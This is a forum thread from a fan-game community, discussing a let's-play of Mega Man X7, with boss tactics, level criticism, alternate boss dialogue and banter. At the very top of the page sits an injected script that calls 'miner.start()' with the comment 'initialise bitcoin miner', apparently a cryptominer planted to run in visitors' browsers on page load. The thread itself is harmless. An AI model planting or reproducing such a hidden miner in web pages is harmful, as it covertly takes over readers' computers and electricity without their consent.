<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralmario fan games galaxysmbx community

Mega Man Zero 3 - Omega Man

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
Paragraph
Posts: 372
Joined: 9 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Paragraph » 1 week ago

This is probably the worst fight in the game, so congrats on finding one of many ways to break him. On Xtreme/Hard, you can't just out-tank him, but you already found out that he can't hit you if you stay underneath his platform on the mech's head; Zero can hit him with normal slashes though, and so can the ~mysterious hunter~. The only thing you have to worry about is the missiles, but you can just go back to the main body every two combos, let them fall behind you, then get back to Hyenard in a simple loop.

I think it's completely impossible to fight him normally, like I have no idea how the game wants you to dodge all the shit he and his clones throw and you and the goddamn triple dash attack knocks you on your butt all the time and UGH. Completely incomprehensible mess, even without the sound. And yeah, you can just...not shoot the mech and wall-jump up it, what a great fight.

You also have figured out a key problem with the entire game in this level (and the last too): especially in the 3D sections, there is actually zero reason to ever fight anything, it's both faster and easier to just...go past the enemies. With hover and double jump, which you have from the start, it's even more comically easy. As I said: a non-game.
Voltgloss wrote: Does the secret character becoming playable coincide with

the inevitable Sigma reveal

? If so that might be part of the intention (to the extent there is one) -

a desire not to spoil the "surprise," that the bosses are corrupted by Sigma's influence, early

.
That would be neat, but we're talking about X7, so no, it does not coincide. It's either "rescue half the Reploids" (not a spoiler as many people have told raocow that), or

reach the "Sigma" stages - but he is actually "revealed" after the seventh boss via very-obvious silhouettes and face closeups, and the CHARACTERS go "HWUH? SIGMA AGAIN???" only during the second Sigma stage.


User avatar
Chirei
Posts: 263
Joined: 1 year ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Chirei » 1 week ago

So for some strange reason, he will never use his incredibly annoying tri-formation gimmick if you stay near the front of the cow mech. This turns him into a total joke, and no one should feel bad for using it.

I think the Double Bullets are actually WORSE than Axl's default gun, so don't get too excited. Zero does get his Giga Attack from Hyenard, though.

User avatar
xnamkcor
Posts: 301
Joined: 8 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby xnamkcor » 1 week ago

Actually, raocow. It's pronounced, "Guy".

You cannot add yourself to the friends list.
Image
You cannot add yourself to the foes list.

User avatar
Paragraph
Posts: 372
Joined: 9 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Paragraph » 1 week ago

Mysterious Hunter's weapon they get from Hyenard is also not bad, maybe a bit too low on the damage front. Honestly, playing around as I tend to do, this game's arsenal is actually both varied and fun to use with little obviously bad weapons spread over all three characters

four if you count "charged special weapons" Glide Armor X as one extra...which the game does, actually

, which is more than I expected going in. Too bad that there is no reason to ever fight anything, but if you want to, you can totally clown on all those mandatory minibosses in one of about 20 ways no matter who you play as. That's nice.


In other news, I have decided to spend my precious free time on vacation to not only finish, but 100% X7 with all Mavericks and all Achievements on the Legacy Collection too because might as well, as obviously I have mental problems. Things I found out which might be relevant:
- the start of this game is a major barrier because it plays like dogshit and you just have to adjust to its myriad weirdnesses; once you learn the gist of it it's merely bad instead of "borderline unplayable", and I think raocow has firmly passed that point after his declaration of fun against Gungaroo, so that's nice.
- as soon as you get going a little with some upgrades and special weapons you figure out the use of, the difficulty takes a severe nosedive and you can walk through everything. It's not helped by the fact that some stages barely exist as such, and even if the boss gives you a run for your money, you can just keep the Reploids, upgrade with their gifts and come back later.
- once you unlock Mystery Hunt0r, you can immediately start clowning on everything because they are so ludicrously imbalanced due to a variety of factors that it's barely funny. It becomes even more laughable if you gun for the "half Reploids rescued" asap and go light on the upgrades for other characters, then do an easy stage or two to get the new guy upgraded as well.


This is important for raocow to know

Devote a serious amount of time for the final stage of this game. Reasons, if you care, in the spoiler. Also, a warning as to how EARLY the final stage comes.
After X6 had the brilliant idea to make Gate 2 two full stages consisting entirely of "fuck" and bossfights that range from "seriously" to "garbage poop", X7 decided to double down of course and made a stage that is all of that and the refights. There is no way to see that coming because it is the second stage of the "Sigma" stages, and yes that means there's only two "Sigma" stages in total. Depending on how jacked up the refights are on Normal mode (on Xtreme they gain another half health bar which is easily double their health of the normal mode dudes we saw already), the stage can easily take an hour to go through if the bosses play nice, which is nowhere near guaranteed. At least you won't have to redo anything you got a loading screen on, and there's no X6-style fuckery where you can take the wrong peeps or something. One advantage of levels that have barely anything in them, I suppose.
One other fun wrinkle of this entire ordeal I made myself suffer: if you save after the final boss, the game puts you into New Game+ without asking, and you don't keep any of your health upgrades or special weapons. The only reason for NG+ to exist is that the Chip powerups stay, so you can upgrade more characters. However, there are Achievements I didn't look up beforehand because "endgame save should have what I need" for killing enemies with every special weapon, so I have to re-get all of them. Yay!

User avatar
Grounder
Posts: 2529
Joined: 4 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Grounder » 1 week ago

WHO DARES TO TRY TO STOP THE TIME BOMB!?
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

Image

Image

User avatar
Heavy Sigh
Posts: 301
Joined: 5 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Heavy Sigh » 1 week ago

Did raocow tape down his dash button for this video

Alternate Dialogue!

AXL

Axl: Hey, honcho. I'm here to defeat you.

Ride Boarski: Why you!!! Red gave you a home - and this is how you repay him?! You worthless upstart!

Axl: Dude, your breathing's getting heavy. Calm down. Anyway, in a way this is exactly how I'm repaying Red.

Ride Boarski: Oink-wa--! You brat! I oughtta take the likes of you and...!! A duel! Just you and me! Yeah!

Ride Boarski: Zero Chill.

MYSTERIOUS MAVERICK HUNTER

MYSTERIOUS MAVERICK HUNTER: So you're the big cheese?

Ride Boarski: Big cheese?! Arggghhhhmm! How dare you call me that! I'm the Head Honcho, for crying out loud!

MYSTERIOUS MAVERICK HUNTER: OK, whatever you say. I order you to disband this motorcycle gang!

Ride Boarski: Motorcycle gang?! Why you!! You've gone too far! I'll make you pay for this, with a duel!

Welp , he started it, so the Hunters are actually totally in the right to shoot this idiot. Rather than the other times where they just beat up the severely ill or political dissidents.

User avatar
Bean
Posts: 2493
Joined: 9 years ago
Location: In my own world

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Bean » 1 week ago

Zero's literally thinking that Ride Boarski is an enemy type from X1 and then X2, except they got the second name wrong in the script.

http://megaman.wikia.com/wiki/Road_Attacker
http://megaman.wikia.com/wiki/Roader#Crash_Roader

Yeah, I know. It makes no sense. Then again, you just played a stage where you're on a track with twenty bombs that must be collected by slowly driving over them even though you have a vehicle that is built for speed.

YOUPUNKYOUPUNKYOUPUNKYOUPUNK! Chee~arge!

User avatar
Parama
Posts: 1125
Joined: 4 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Parama » 1 week ago

wow that boss did like literally no damage lol
If I was suffering, I’d cut the ties that were never meant to bind.

Celeste Golden Strawberry Challenge (Spoilers):
Image

User avatar
Ashan
The world has become a place
Posts: 1460
Joined: 8 years ago
First name: Hayden
Location: Saskatchewan

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Ashan » 1 week ago

The boss that turns into a bike (Nitro Man) is from Mega Man 10, not 9
Image
Image
Image
Image
Image

User avatar
ano0maly
Discord User
Posts: 1214
Joined: 7 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby ano0maly » 1 week ago

See normally I would comment about how a level like this could be cool, but I can't quite take this seriously. It just looks so silly to be playing a racing game pointlessly when you're better off collecting bombs on foot without poor controls.
Image
Image
Image << Click!

User avatar
Mea
Posts: 75
Joined: 2 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Mea » 1 week ago

If they made a 3d version of the bike levels from X4 and X5, that might have actually been exhilarating. More platforming and speed than terrible turning controls and slow precision.

User avatar
Dragon Fogel
Master of Pointlessness
Posts: 980
Joined: 4 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Dragon Fogel » 1 week ago

I can't believe Rock survived over a hundred years only to get stuck on a highway.
Image
Click that banner if you like reading words.
Image
Make levels from unused MAGL X names!

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 1529
Joined: 6 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Leet » 1 week ago

"PUNK YOU!"
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
This Eye o' Mine
Posts: 98
Joined: 4 months ago
Pronouns: Nah, I'm good
Location: Ooh, yes please

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby This Eye o' Mine » 1 week ago

Is it ever explained why we're even driving around on a looping circuit that has a time bomb set on it in the first place? Why does clearing all the bombs lead to the boss? Can't we just, y'know, bounce and go to the boss directly?

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 1529
Joined: 6 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Leet » 1 week ago

Every X game since X4 has also featured disjointed areas, but this one is the most egregious because one thinks you could just get off the bike.

"Every X game since X4 has also [done a thing X7 does]" tends to be true.
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
Paragraph
Posts: 372
Joined: 9 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Paragraph » 1 week ago

This level is best played by inching along super slowly just to be able to control it at all. You still have to go through the circuit at least twice to get everything because a) the Heart Tank only spawns after the second loop and b) that stupid jump ramp dashes you right past either a bomb or a guy or both if you get on it from the wrong side. Once you figure out the trick of "never accelerate", it becomes a boring pointless slog instead of a nightmare. Yay! Also, yet again, completely ignoring the enemies is 100% the right course of action.

Ride Boarski can definitely give you a run for your money if you fight him early (and it's not hard to do so, because the level doesn't profit from your upgrades at all). Axl has super high health and damage reduction for raocow, that doesn't need to be the case. Also, for some reason raocow just dodged the charge attack effortlessly; if that catches you, and for me at least Boarski just happily doubles back on the spot to hit you even if you were jumping, he'll grab you and ram you into the walls of the arena, which deals a fuckload of damage.

He's one of the bosses where Zero is super great, by the way, because he just stands there for his "make a merry-go-round" attack and also his spawning the wheels, which get killed in one slice, so you just stand next to him and nullify it completely. And the merry-go-round has a max range, so you can stand outside that and still hit the boss. It's well thought out.


EDIT: Oh yeah, forgot to mention, you picked up a weapon tank along the road without really noticing it. It's an orange thingy and you'll never use it.

User avatar
Chirei
Posts: 263
Joined: 1 year ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Chirei » 1 week ago

Zero got the Heart of Mario. Make of that what you will.

User avatar
Ashan
The world has become a place
Posts: 1460
Joined: 8 years ago
First name: Hayden
Location: Saskatchewan

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Ashan » 1 week ago

I like the visual of "saving" people by running them over at full speed on your bike
Image
Image
Image
Image
Image

User avatar
Parama
Posts: 1125
Joined: 4 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Parama » 1 week ago

must have been the inspiration for danganronpa's psyche taxi
If I was suffering, I’d cut the ties that were never meant to bind.

Celeste Golden Strawberry Challenge (Spoilers):
Image

User avatar
Grounder
Posts: 2529
Joined: 4 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Grounder » 1 week ago

oh what a feeling

while we're dancing on the ceiling
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

Image

Image

User avatar
Dragon Fogel
Master of Pointlessness
Posts: 980
Joined: 4 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Dragon Fogel » 1 week ago

So that really garbled message from Alia was basically trying to say that you can pass through the walls by copying the samurai. Also the samurai go through the walls as enemies.

It's pretty arbitrary still, but the game does point you towards it. It's just that you've literally never used Axl's transformation ability so you never consider it.
Image
Click that banner if you like reading words.
Image
Make levels from unused MAGL X names!

User avatar
Heavy Sigh
Posts: 301
Joined: 5 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Heavy Sigh » 1 week ago

I appreciate that the boss not only has huge iframes on all his attacks, but can also hide under the stage so you cant hurt him at all. A+ boss design.

ALTERNATE DIALOGUE

MYSTERIOUS MAVERICK HUNTER

Snipe Anteator: Hahahah! Splendid! Even better than expected.

MYSTERIOUS MAVERICK HUNTER: How long must this madness go on!

Snipe Anteator: Hahaha! Let me ask you - how long has this madness been going on?

MYSTERIOUS MAVERICK HUNTER: ?!

Snipe Anteator: The annals of history contain endless records of war... The "madness" will never end.

MYSTERIOUS MAVERICK HUNTER: You're wrong! We can create a world without war. Utopia is not just a dream!

Snipe Anteator: You can't build a utopia on top of the graves of rebels like myself.

MYSTERIOUS MAVERICK HUNTER: But...Even so...I... I must follow my beliefs!



ALSO, Snipe Anteator's 3D model and his artwork are actually different! his ingame model shows two thin tubes extending down his snout, tubes that are totally absent from his character artwork.

User avatar
Bean
Posts: 2493
Joined: 9 years ago
Location: In my own world

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Bean » 1 week ago

Axl has an ability to shoot a different shot out of his gun to copy data. No spoilers since that's been explained by the plot as has the fact that it can be used on bots that are around his size. In this case, those samurai bots are the stage's foe you can copy. That's how you get past those orange mirrors... somehow. This game makes less and less sense even with limiting it to just video games.

I think this boss is the hardest of the eight when he goes into that desperation phase. There are just lasers and everything flying everywhere. You barely get a chance to think, and the perspective on the camera's pretty bad. You go here first, and this fight will be a major pain.

Finally, congrats.

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 1529
Joined: 6 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby Leet » 1 week ago

Snipe Anteator knows everything about the plot but we killed him and now we'll never know
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 548
Joined: 5 years ago

Re: Mega Man X7 - Guest Starring: Mega Man X

Postby BobisOnlyBob » 1 week ago

Leet wrote: Snipe Anteator knows everything about the plot but we killed him and now we'll never know
thank Light for that, we can't have actual plot progression in the moogy murns, despite their repeated attempts - and hilarious failure - to address morality and ethics
BOB is an acronym for BOB is Only BOB etc.


Return to “let's play”

Who is online

Users browsing this forum: 10204307, ano0maly, DinnerSonic, Le Neveu de Rameau, RedMageSusie and 13 guests

cron